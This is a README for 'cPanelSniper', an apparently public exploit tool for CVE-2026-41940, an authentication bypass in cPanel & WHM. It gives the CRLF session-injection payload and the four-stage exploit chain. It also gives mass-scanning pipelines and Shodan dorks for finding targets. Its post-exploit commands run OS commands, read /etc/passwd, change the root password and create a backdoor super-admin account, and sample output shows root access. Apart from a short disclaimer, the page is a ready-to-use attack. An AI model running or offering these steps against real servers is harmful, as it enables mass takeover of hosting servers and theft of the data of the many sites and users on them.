Share
## https://sploitus.com/exploit?id=45A263F9-3CDF-57F8-9637-E0D5F28635FF
# cPanelSniper
CVE-2026-41940 β cPanel & WHM Authentication Bypass via Session-File CRLF Injection
4-stage exploit chain Β· Interactive WHM Shell Β· Bulk scanner Β· Pipeline ready Β· stdlib only
---
## Overview
**cPanelSniper** is a focused exploitation framework for **CVE-2026-41940**, a critical authentication bypass vulnerability affecting cPanel & WHM. The vulnerability allows unauthenticated remote attackers to gain root-level WHM access by injecting CRLF sequences into the session file via the `Authorization` HTTP header β without any valid credentials.
- **CVSS Score:** 10.0 (Critical)
- **In-the-wild exploitation:** Confirmed (April 2026)
- **Affected installs:** ~70 million domains running cPanel & WHM
- **No dependencies:** Pure Python stdlib β no pip, no requests, no external packages
> **For authorized penetration testing and bug bounty programs only.**
---
## How It Works
The root cause lives in `Session.pm`: the `saveSession()` function calls `filter_sessiondata()` **after** writing the session file to disk. This means CRLF characters embedded in the `Authorization: Basic` header value are written verbatim into the session file, injecting attacker-controlled fields before sanitization occurs.
```
Normal flow:
POST /login/ β filter_sessiondata() β write session β auth check
Vulnerable flow:
POST /login/ β write session (CRLF payload injected) β filter_sessiondata() β auth check reads poisoned file
```
### The CRLF Payload
The `Authorization: Basic` value decodes to:
```
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
```
These fields are written directly into the session file on disk. When read back, cPanel treats the session as a fully authenticated root session.
### 4-Stage Exploit Chain
```
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Stage 0 β Canonical Hostname Discovery β
β GET /openid_connect/cpanelid β 307 β real hostname β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 1 β Mint Preauth Session β
β POST /login/?login_only=1 (wrong creds) β
β β 401 + whostmgrsession cookie β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 2 β CRLF Injection β
β GET / + Cookie: session + Authorization: Basic β
β cpsrvd writes CRLF fields into session file β
β β 307 Location: /cpsessXXXXXXXXXX/... β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 3 β Propagate (do_token_denied gadget) β
β GET /scripts2/listaccts β
β Triggers rawβcache flush β injected fields become active β
β β 401 Token denied (expected) β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β Stage 4 β Verify WHM Root Access β
β GET /cpsessXXXXXXXXXX/json-api/version β
β β 200 {"version":"11.x.x.x","result":1} = PWNED β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
## Affected Versions
| Branch | Vulnerable | Patched |
|--------|-----------|---------|
| 110.x | β€ 11.110.0.96 | **11.110.0.97** |
| 118.x | β€ 11.118.0.62 | **11.118.0.63** |
| 126.x | β€ 11.126.0.53 | **11.126.0.54** |
| 132.x | β€ 11.132.0.28 | **11.132.0.29** |
| 134.x | β€ 11.134.0.19 | **11.134.0.20** |
| 136.x | β€ 11.136.0.4 | **11.136.0.5** |
---
## Installation
```bash
git clone https://github.com/ynsmroztas/cPanelSniper
cd cPanelSniper
python3 cPanelSniper.py --help
```
No pip install required. Pure Python 3.8+ stdlib only.
---
## Usage
### Basic Scan
```bash
# Single target β scan only
python3 cPanelSniper.py -u https://target.com:2087
# Single target β interactive shell after bypass
python3 cPanelSniper.py -u https://target.com:2087 --action shell
# Bulk scan from file
python3 cPanelSniper.py -l targets.txt -t 20 -o results.json
# Force scan (skip cPanel detection)
python3 cPanelSniper.py -u https://target.com:2087 --force
```
### Post-Exploit Actions
```bash
# List all cPanel accounts on the server
python3 cPanelSniper.py -u https://target.com:2087 --action list
# Execute OS command
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "id;whoami;uname -a"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "ls /home"
python3 cPanelSniper.py -u https://target.com:2087 --action cmd --cmd "cat /etc/passwd"
# Get server info (hostname, load, disk, MySQL host)
python3 cPanelSniper.py -u https://target.com:2087 --action info
# Get cPanel version
python3 cPanelSniper.py -u https://target.com:2087 --action version
# Change root password
python3 cPanelSniper.py -u https://target.com:2087 --action passwd --passwd 'NewPass@2026!'
# Interactive WHM shell
python3 cPanelSniper.py -u https://target.com:2087 --action shell
```
### Pipelines
```bash
# subfinder β httpx β cPanelSniper
subfinder -d target.com -silent | \
httpx -silent -ports 2087,2086 -threads 50 | \
python3 cPanelSniper.py -t 30 -o results.json
# From scope list
cat scope.txt | \
httpx -silent -ports 2087,2086 -threads 100 | \
python3 cPanelSniper.py -t 30 -o results.json
# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
awk '{print "https://"$1":"$2}' | \
python3 cPanelSniper.py -t 30 -o shodan_results.json
# stdin pipe
echo "https://target.com:2087" | python3 cPanelSniper.py
# Multiple sources combined
{ subfinder -d target.com -silent; cat extra.txt; } | \
httpx -silent -ports 2087 | \
python3 cPanelSniper.py -t 20 --action list
```
---
## Interactive WHM Shell
After a successful bypass, the `--action shell` flag drops into an interactive prompt:
```
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
WHM Shell β target.com
Version: CVE-2026-41940 | Auth: CRLF bypass
Type 'help' for commands, 'exit' to quit
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
mitsec@target.com βΆ id
uid=0(root) gid=0(root) groups=0(root)
mitsec@target.com βΆ accounts
[cPanel Accounts] target.com:2087 (47 users)
user01 domain: example.com email: admin@example.com
user02 domain: shop.com email: info@shop.com
...
mitsec@target.com βΆ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mitsec@target.com βΆ info
[Server Info] https://target.com:2087
hostname: srv01.target.com
load: 0.72 / 0.66 / 0.69
version: 11.130.0.6
mitsec@target.com βΆ addadmin mitsec P@ss2026!
[BACKDOOR ADMIN CREATED]
Target : https://target.com:2087
Username : mitsec
Password : P@ss2026!
Profile : super_admin
mitsec@target.com βΆ exit
```
### Shell Commands
| Command | Description |
|---------|-------------|
| `id` / `whoami` | Show UID and hostname |
| `hostname` | Get server hostname |
| `version` | cPanel version info |
| `info` | Load, disk, MySQL host, version |
| `accounts` | List all cPanel user accounts |
| `cat ` | Read file content |
| `ls [path]` | List directory |
| `exec ` | Execute OS command |
| `addadmin ` | Create backdoor WHM admin |
| `passwd ` | Change root password |
| `api [k=v ...]` | Raw WHM JSON API call |
| `help` | Show all commands |
| `exit` | Exit shell |
---
## CLI Reference
```
usage: cPanelSniper.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
[-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
[--action ACTION] [--passwd PASS] [--cmd CMD]
[--new-user USER] [--new-domain DOMAIN]
[-o OUTPUT] [--no-color]
Target:
-u, --url URL Single target URL (e.g. https://host:2087)
-l, --list LIST File with URLs (one per line)
--hostname HOSTNAME Override canonical Host header (auto-discovered)
Scan:
-t, --threads N Concurrent threads (default: 10)
--timeout N Request timeout seconds (default: 15)
--rate-limit N Delay between targets (default: 0)
--force Skip cPanel detection check
Post-Exploit:
--action ACTION Action: list | passwd | cmd | exec | info |
version | shell | adduser
--passwd PASS New root password (--action passwd)
--cmd CMD OS command (--action cmd/exec)
--new-user USER New cPanel username (--action adduser)
--new-domain DOMAIN New cPanel domain (--action adduser)
Output:
-o, --output FILE Save results to JSON file
--no-color Disable ANSI colors
```
---
## Shodan Dorks
```
title:"WHM Login"
title:"WebHost Manager" port:2087
product:"cPanel" port:2087
http.title:"cPanel" port:2083
ssl.cert.subject.cn:"cPanel" port:2087
```
---
## Output Example
```
ββββββββββββββ ββββββ ββββ ββββββββββββββ
βββββββββββββββββββββββββββββ ββββββββββββββ
...
CVE-2026-41940 β cPanel & WHM Auth Bypass via CRLF Injection
4-stage: preauth β CRLF inject β propagate β verify β post-exploit
In-The-Wild | CVSS 10.0 | By Mitsec (@ynsmroztas)
Configuration:
Targets : 1
Threads : 10
Timeout : 15s
Action : list
14:46:22 [SCAN] Starting 4-stage exploit chain... https://target.com:2087
14:46:23 [INFO] Canonical hostname discovered: srv01.target.com
14:46:23 [STEP] Stage 1/4 β Minting preauth session...
14:46:23 [ OK] Stage1: preauth session = :QFB4o8XENBqlr6U1...
14:46:23 [STEP] Stage 2/4 β CRLF injection via Authorization header...
14:46:24 [ OK] Stage2: HTTP 307 β token=/cpsess8493537756
14:46:24 [STEP] Stage 3/4 β Firing do_token_denied gadget (rawβcache)...
14:46:25 [ OK] Stage3: HTTP 401 β do_token_denied gadget fired
14:46:25 [STEP] Stage 4/4 β Verifying WHM root access...
14:46:26 [PWND] CVE-2026-41940 CONFIRMED β WHM root access!
14:46:26 [PWND] Token : /cpsess8493537756
14:46:26 [PWND] Version : 11.130.0.6
14:46:26 [PWND] API URL : https://target.com:2087/cpsess8493537756/json-api/version
14:46:26 [ API] Running post-exploit action: list
14:46:27 [ API] listaccts β HTTP 200
[cPanel Accounts] target.com:2087 (47 accounts)
client01 domain: client01.com email: admin@client01.com
client02 domain: client02.net email: info@client02.net
...
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
cPanelSniper β Scan Complete
Time: 5.8s Β· Targets: 1
β‘ 1 VULNERABLE TARGET(S)
Target : https://target.com:2087
Version : 11.130.0.6
Token : /cpsess8493537756
API URL : https://target.com:2087/cpsess8493537756/json-api/version
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
```
---
## Technical Details
### Session File Injection
The injected `Authorization: Basic` value (base64-decoded) contains CRLF sequences that become newlines in the cPanel session file:
```
root:x\r\n
successful_internal_auth_with_timestamp=9999999999\r\n
user=root\r\n
tfa_verified=1\r\n
hasroot=1
```
cPanel's session reader parses these as legitimate session fields, granting full root WHM access.
### Stage 3 β The do_token_denied Gadget
The critical and often-overlooked step: after the CRLF injection (Stage 2), the poisoned session data exists only in the **raw session file**. A request to `/scripts2/listaccts` triggers the internal `do_token_denied` handler, which flushes the raw session data into the session **cache**. Without this flush, Stage 4 would return a 403.
### Session Token Extraction
```
Set-Cookie: whostmgrsession=%3aSESSION_NAME%2cOB_HEX; ...
^ ^
| +-- ob hash (stripped)
+-- session name (used for injection)
```
The session name (before `%2C`) is extracted and used as the cookie value for subsequent requests.
---
## References
- [watchTowr Labs β CVE-2026-41940 Technical Analysis](https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/)
- [cPanel Security Advisory](https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026)
- [NVD β CVE-2026-41940](https://nvd.nist.gov/vuln/detail/CVE-2026-41940)
- [Hadrian Blog β CVE-2026-41940 Analysis](https://hadrian.io/blog/cve-2026-41940-a-critical-authentication-bypass-in-cpanel)
- [Nuclei Template β CVE-2026-41940](https://cloud.projectdiscovery.io/library/CVE-2026-41940)
---
## Disclaimer
> This tool is intended for **authorized security testing** and **bug bounty programs only**. Unauthorized access to computer systems is illegal. The author assumes no liability and is not responsible for any misuse or damage caused by this tool. Always obtain proper written authorization before testing.
---
## Author
**Mitsec** β [@ynsmroztas](https://twitter.com/ynsmroztas)
- π Top Hacker β Intigriti
- π 2,430+ vulnerabilities disclosed
- π 1,100+ P1 Critical findings
- π
100+ Hall of Fame recognitions
---
Made with β€οΈ by @ynsmroztas